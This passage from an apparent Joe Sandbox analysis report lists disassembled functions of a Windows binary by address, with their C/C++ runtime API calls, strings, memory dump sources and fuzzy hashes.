                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: 4812def822cf25a1c19e2e4efc2f30056c00a527d672b8fd96eba2a24ed41545
                                                      • Instruction ID: e6bc82684b9fa13dd2910ff2777d09aea0d54092f5b7fdf5cddd084eb334540c
                                                      • Opcode Fuzzy Hash: 4812def822cf25a1c19e2e4efc2f30056c00a527d672b8fd96eba2a24ed41545
                                                      • Instruction Fuzzy Hash: 93018871E4071AAFDB216B71AC0DA6F3758EF8175270A4411FE0CD62A4DB60C848BB63
                                                      Function 00F56630 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F5665C
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F56679
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F5669D
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F566C8
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F5673A
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00F5678F
                                                      • __Getctype.LIBCPMT ref: 00F567A6
                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00F567E6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F56888
                                                      • std::_Facet_Register.LIBCPMT ref: 00F5688E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                      • String ID: bad locale name
                                                      • API String ID: 103145292-1405518554
                                                      • Opcode ID: 807cc7b2c9c59b4a77ffc5aa6189fbd1120218173d1ff9b25a33ee3f01aec433
                                                      • Instruction ID: 53b0985c06b4bc91793884cd60142e49296e4839d33b0f2fc19a1a577d26c265
                                                      • Opcode Fuzzy Hash: 807cc7b2c9c59b4a77ffc5aa6189fbd1120218173d1ff9b25a33ee3f01aec433
                                                      • Instruction Fuzzy Hash: 8D618EB19043408FD710DF24D941B5BB7E4BF98355F48491CEE99DB222EB34E909DB92
                                                      Function 00F5AD34 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F5AD3A
                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00F5AD48
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00F5AD59
                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00F5AD6A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                      • API String ID: 667068680-1247241052
                                                      • Opcode ID: 4c9d848548061fb28a8f5c2061d5918be82f7b1519dbd81327b48fd8266711e3
                                                      • Instruction ID: 1105d3c90c829b15db57b36a8d7d33e1ee27b1075033b18fd9f42417253606ba
                                                      • Opcode Fuzzy Hash: 4c9d848548061fb28a8f5c2061d5918be82f7b1519dbd81327b48fd8266711e3
                                                      • Instruction Fuzzy Hash: AEE0EC7195122CAF83019F70BC0E99A3FA4AB467553028813F40DD2262D7B08484BFA3
                                                      Function 00F5E828 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • type_info::operator==.LIBVCRUNTIME ref: 00F5E947
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 00F5EA55
                                                      • _UnwindNestedFrames.LIBCMT ref: 00F5EBA7
                                                      • CallUnexpected.LIBVCRUNTIME ref: 00F5EBC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2751267872-393685449
                                                      • Opcode ID: eb49dc36b74d2cdf15cb54aec0b0ecea623f5c9ef26d425fc217a5719170c729
                                                      • Instruction ID: 42f5501b0d043fd4f7c7403fcb020c44fb0a2d2171aec02fec28a8c3a6623358
                                                      • Opcode Fuzzy Hash: eb49dc36b74d2cdf15cb54aec0b0ecea623f5c9ef26d425fc217a5719170c729
                                                      • Instruction Fuzzy Hash: 78B17975C00219EFCF28DFA4C8819AEBBB5BF44322F14415AEE156B202D334DB59EB91
                                                      Function 00F780C2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$Info
                                                      • String ID:
                                                      • API String ID: 127012223-0
                                                      • Opcode ID: f6c7dd3a4088d3b3023379f334e0c5989e33fa98a8a01cd66e946fb4cb2a17f5
                                                      • Instruction ID: 38ac0f39b7725ab4508c71384dc9aeacc0a86de0e9b5507be3c9c81d92c954d2
                                                      • Opcode Fuzzy Hash: f6c7dd3a4088d3b3023379f334e0c5989e33fa98a8a01cd66e946fb4cb2a17f5
                                                      • Instruction Fuzzy Hash: A7712A32D402099BDF219E68CC49FAE77B99F457A0F288057E91CA7241EF759C03E762
                                                      Function 00F5A4D4 Relevance: 10.7, APIs: 7, Instructions: 153threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A4FC
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A519
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A53A
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A5BD
                                                      • __Xtime_diff_to_millis2.LIBCPMT ref: 00F5A5D5
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A601
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F5A647
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentThread$Xtime_diff_to_millis2
                                                      • String ID:
                                                      • API String ID: 1280559528-0
                                                      • Opcode ID: 5efdf5c3d5b953ae1527e3bd0fddf122bfcf0f4a07fd9be03c346ec15b82c2ff
                                                      • Instruction ID: ce8a2f5a8af6e1766f8661b15c09e674ae0e12febb4a8f23e77fd1b9fd728af1
                                                      • Opcode Fuzzy Hash: 5efdf5c3d5b953ae1527e3bd0fddf122bfcf0f4a07fd9be03c346ec15b82c2ff
                                                      • Instruction Fuzzy Hash: 40519C71D00105CFCF21CF24D9819ADB7B0AF08722B294659DE4A9B245EB34ED99EF93
                                                      Function 00F683E7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,8C9F690D,?,00F684F4,00F54C93,?,?,00000000), ref: 00F684A8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3664257935-537541572
                                                      • Opcode ID: 59394ddaa696c4fc96ee4cfdec6013d3a36a9352313e4fbeabe38b2cc132bc31
                                                      • Instruction ID: f5289dba1524b1ac7c7e6a2d6283adc4a82354180f0cdb9c25da0d5991b88da3
                                                      • Opcode Fuzzy Hash: 59394ddaa696c4fc96ee4cfdec6013d3a36a9352313e4fbeabe38b2cc132bc31
                                                      • Instruction Fuzzy Hash: 0421A572E0021AABCB21DB24DC41A6A3768EB417F4F260619E919A7291DF30ED42E6D1
                                                      Function 00F75FCF Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27b4f438f055af5fa2de7bf6e043b2adcc58b38dd55a2510bd00160d3c6a789f
                                                      • Instruction ID: 0842efb85beea37747f6a92dd21e31ebe56b9cee6b6b5de4ea4f7f0b4712f117
                                                      • Opcode Fuzzy Hash: 27b4f438f055af5fa2de7bf6e043b2adcc58b38dd55a2510bd00160d3c6a789f
                                                      • Instruction Fuzzy Hash: 01B1D171E04649AFDF51DF98CC80BBDBBB1BF45310F18815AE409AB292C7749D41EB62
                                                      Function 00F5E4BA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00F5E4B1,00F5C0BF,00F58281,8C9F690D,?,?,?,?,00F79112,000000FF), ref: 00F5E4C8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F5E4D6
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F5E4EF
                                                      • SetLastError.KERNEL32(00000000,?,00F5E4B1,00F5C0BF,00F58281,8C9F690D,?,?,?,?,00F79112,000000FF), ref: 00F5E541
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 694020a4b9c7920956bfbe50cb342979b225ad340393982ec792cc3338e42e64
                                                      • Instruction ID: 6851e9a4a9736d9aea5a14be4b07023a5f109db6b0475d02a80be80a75149f25
                                                      • Opcode Fuzzy Hash: 694020a4b9c7920956bfbe50cb342979b225ad340393982ec792cc3338e42e64
                                                      • Instruction Fuzzy Hash: 8801283350D7165DA7183BB57C4967A3654EB65B767280339FE11810F0FF518D0CB245
                                                      Function 00F652AF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8C9F690D,?,?,00000000,00F792E8,000000FF,?,00F6523F,?,?,00F65213,00000016), ref: 00F652E4
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F652F6
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00F792E8,000000FF,?,00F6523F,?,?,00F65213,00000016), ref: 00F65318
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: fc5fb65cb9609c89717c0611971e3c91b54c3a238cc47aeba3c4f00ade092759
                                                      • Instruction ID: 64c899496f0bccdc7b8bf0601bb17a7864604ba17128dd711aa6eddf601b83bb
                                                      • Opcode Fuzzy Hash: fc5fb65cb9609c89717c0611971e3c91b54c3a238cc47aeba3c4f00ade092759
                                                      • Instruction Fuzzy Hash: 0101DB31904619EFDB118F50DD05FAEBBB9FB44F54F004529F815B26D0DBB59900DB52
                                                      Function 00F55110 Relevance: 7.8, APIs: 5, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock
                                                      • String ID:
                                                      • API String ID: 1418687624-0
                                                      • Opcode ID: 01a384246dc268ac02439d6f0b32246a4622af30da12120cee141c8742499359
                                                      • Instruction ID: b759b48ea652a0920ecf00b7bb05f4305c6682f80546846aa29c61dca5794054
                                                      • Opcode Fuzzy Hash: 01a384246dc268ac02439d6f0b32246a4622af30da12120cee141c8742499359
                                                      • Instruction Fuzzy Hash: 649157B1900B019FC724DF74D81466ABBE4BF41322F048A2EEE5947641E775E94CDBA3
                                                      Function 00F6CC51 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __alloca_probe_16.LIBCMT ref: 00F6CCD8
                                                      • __alloca_probe_16.LIBCMT ref: 00F6CD99
                                                      • __freea.LIBCMT ref: 00F6CE00
                                                        • Part of subcall function 00F694CC: HeapAlloc.KERNEL32(00000000,?,?,?,00F5B1FD,?,?,00F54C93,0000000C), ref: 00F694FE
                                                      • __freea.LIBCMT ref: 00F6CE15
                                                      • __freea.LIBCMT ref: 00F6CE25
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$__alloca_probe_16$AllocHeap
                                                      • String ID:
                                                      • API String ID: 1096550386-0
                                                      • Opcode ID: 7a09279c5d3f84290fcce5716f1d4481c6d6bfcc5c5ad72891038e31d7fd83d1
                                                      • Instruction ID: 1c36e6d169b4c3f44594abdc0ba0c9c4c2b6791c26992277f896b4034b8c799c
                                                      • Opcode Fuzzy Hash: 7a09279c5d3f84290fcce5716f1d4481c6d6bfcc5c5ad72891038e31d7fd83d1
                                                      • Instruction Fuzzy Hash: C851B772A0010AAFEF259F64CC41EBB3AA9EF14764F190129FD98D7250EB35DC10A7E0
                                                      Function 00F57760 Relevance: 7.6, APIs: 5, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlock$Cnd_broadcastConcurrency::cancel_current_task
                                                      • String ID:
                                                      • API String ID: 3354401312-0
                                                      • Opcode ID: 1ccf7df723b30613023e780c99abaa72fdbcf87617539b6aa3d71e82fbb044ac
                                                      • Instruction ID: 440e49b077d34271796f90f39b22beca2dd4fced556265251187e6c1f519269b
                                                      • Opcode Fuzzy Hash: 1ccf7df723b30613023e780c99abaa72fdbcf87617539b6aa3d71e82fbb044ac
                                                      • Instruction Fuzzy Hash: 7931B4B1A05305ABCB10EF20EC45A9BB7E4AF44356F04452DFE1693241EB38E91DDBA2
                                                      Function 00F591AE Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00F591B5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00F591BF
                                                        • Part of subcall function 00F51C10: std::_Lockit::_Lockit.LIBCPMT ref: 00F51C2C
                                                        • Part of subcall function 00F51C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00F51C49
                                                      • codecvt.LIBCPMT ref: 00F591F9
                                                      • std::_Facet_Register.LIBCPMT ref: 00F59210
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00F59230
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                      • Associated: 00000000.00000002.1701246741.0000000000F50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701300528.0000000000F7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701324839.0000000000F89000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701344204.0000000000F8A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1701444135.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f50000_1hibLFnCm1.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                      • String ID:
                                                      • API String ID: 712880209-0
                                                      • Opcode ID: 3c39539a46029b0fac344fea6ddac8feacc1764db89686b0e668e2c7f4db5669
                                                      • Instruction ID: 7a966ba5d953c453e5304238a983f9c92a601c1f6933fa632f7300f63f6a01e5
                                                      • Opcode Fuzzy Hash: 3c39539a46029b0fac344fea6ddac8feacc1764db89686b0e668e2c7f4db5669
                                                      • Instruction Fuzzy Hash: A301D271904119DBCB09EB64CC466FE7771BF84322F240409EE11AB292CFB89D09B791
                                                      Function 00F52190 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 00F5222D
                                                        • Part of subcall function 00F5C0D1: RaiseException.KERNEL32(E06D7363,00000001,00000003,00F5BE3B,?,?,?,?,00F5BE3B,0000000C,00F88448,0000000C), ref: 00F5C131
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1701264536.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
